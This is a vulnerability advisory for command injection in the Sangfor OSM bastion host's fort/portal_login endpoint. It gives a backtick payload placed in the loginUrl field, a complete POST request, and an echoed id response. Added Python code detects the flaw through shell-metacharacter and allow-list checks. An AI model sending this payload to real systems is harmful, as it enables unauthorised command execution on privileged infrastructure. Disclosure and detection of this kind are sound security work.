
Command Execute in Sangfor OSM


Updated on 2025/11/14:

Title: Command Execute in Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

BUG_Author: Tajang

Affected Version: Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

Vendor: SangFor OSM

Software: SangFor OSM

Vulnerability Files:

  • fort/portal_login

Description:

  1. Execute commands on the frontend:

    • The vulnerability exists in the system's fort/portal_login endpoint.
  2. Exploiting the Command Execution:

    • The loginUrl field submitted to the frontend is passed to a shell, so it can execute system commands.
  3. Example Command Injection Payload:

    • The following payload can be used to execute system commands:

      "{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #

  4. Front-end Command Execution Point:

    • Send a POST request to this URL, with the Content-Type set to JSON format and the body containing the payload above:

      http://<target-ip>/fort/portal_login

  5. Verifying the Exploit:

    • If the command execution is successful, the attacker will see the command output echoed in the response body of the returned packet.

Proof of Concept:

  1. Access the login page of the vulnerable application:

    https://example.com/fort/portal_login

  2. The complete POST packet:

    POST /fort/portal_login HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
    Cookie: 
    Content-Type: application/json; charset=utf-8

    "{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #

  3. If successful, you should see the following content in the response body:

    {
      "redirectUrl": "uid=1005(webuser) gid=1006(webuser) groups=1006(webuser),65534(nogroup)",
      "message": "role为空",
      "isSuccess": false
    }
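As an added defensive example (not part of the original advisory or of the vendor's code), the following Python scans captured /fort/portal_login request bodies for a loginUrl that carries shell metacharacters or falls outside a URL allow-list, and checks responses for the id-style output the advisory shows echoed in redirectUrl. The sample requests, the allow-list pattern and the log record layout are assumptions constructed for this example.

```python
import json
import re

# Constructed sample traffic (made up for this example, not captured from a real device).
SAMPLE_REQUESTS = [
    {"path": "/fort/portal_login",
     "body": '{"userName":"alice","loginUrl":"https://bastion.example/portal","role":"admin","password":"x"}'},
    {"path": "/fort/portal_login",
     "body": '{"userName":"Bob","loginUrl":"`id`","role":"","password":"123456789"}'},
    {"path": "/fort/static/app.js", "body": ""},
]

# Shell metacharacters that never belong in a redirect URL; the advisory's payload uses backticks.
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(|\$\{")
# Assumed allow-list for a legitimate loginUrl: absolute http(s) URL and/or a site-relative path.
SAFE_URL = re.compile(r"^(https?://[A-Za-z0-9.\-]+(:\d+)?)?(/[A-Za-z0-9._~\-/?=&%]*)?$")
# The advisory shows command output echoed in "redirectUrl"; output of id(1) starts like this.
ID_OUTPUT = re.compile(r"\buid=\d+\(")

def classify_login_url(url):
    """Return None if loginUrl looks legitimate, otherwise a short reason string."""
    if not isinstance(url, str):
        return "loginUrl is not a string"
    if SHELL_META.search(url):
        return "shell metacharacters in loginUrl"
    return None if SAFE_URL.match(url) else "loginUrl outside URL allow-list"

def scan_requests(requests):
    """Return (index, reason) for each /fort/portal_login body whose loginUrl fails the checks."""
    alerts = []
    for i, req in enumerate(requests):
        if req.get("path") != "/fort/portal_login":
            continue
        try:
            url = json.loads(req.get("body", "")).get("loginUrl", "")
        except (ValueError, AttributeError):  # not JSON, or JSON that is not an object
            alerts.append((i, "body is not a JSON object"))
            continue
        reason = classify_login_url(url)
        if reason:
            alerts.append((i, reason))
    return alerts

def response_leaks_command_output(response_body):
    """True if a portal_login response carries id(1)-style output in redirectUrl."""
    try:
        redirect = json.loads(response_body).get("redirectUrl", "")
    except (ValueError, AttributeError):
        return False
    return bool(ID_OUTPUT.search(str(redirect)))
```

The same allow-list check, applied server-side before loginUrl is used anywhere, is the mitigation: a redirect target should never reach a shell at all.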

This article is licensed by the author under CC BY 4.0.